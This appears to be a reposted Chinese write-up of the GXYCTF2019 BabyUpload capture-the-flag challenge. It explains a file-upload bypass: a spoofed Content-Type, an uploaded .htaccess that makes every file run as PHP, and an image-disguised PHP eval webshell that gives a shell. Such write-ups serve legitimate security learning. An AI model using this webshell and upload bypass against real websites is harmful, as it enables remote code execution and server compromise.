[GXYCTF2019]BabyUpload

本文转载自查看原文 2020-02-17 20:03 344 CTF刷题

0x00 知识点

文件类型绕过：

Content-Type: image/jpeg

apache环境下上传.hatcess

首先上传一个.htaccess内容如下的文件
:SetHandler application/x-httpd-php

这样所有文件都会解析为php，然后再上传图片马，就可以解析

这里多说一下nginx我们可以尝试.ini配置文件：

文件名后缀不能是 ph 开头，文件内容过滤<?
长传这样的图片马：

GIF89a?
<script language="php">eval($_POST['a']);</script>

emm简单测试一下就getshell了：

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 [GXYCTF2019]BabySQli [GXYCTF2019] MISC杂项题 [GXYCTF2019]Ping Ping Ping BUUCTF-[GXYCTF2019]BabySQli 1详解 [GXYCTF2019]Ping Ping Ping 1思路 [GXYCTF2019]禁止套娃刷题记录：[GXYCTF2019]禁止套娃 NOIP2019(CSP2019) 游记 ZJOI 2019 游记 SQL 2019 卸载方法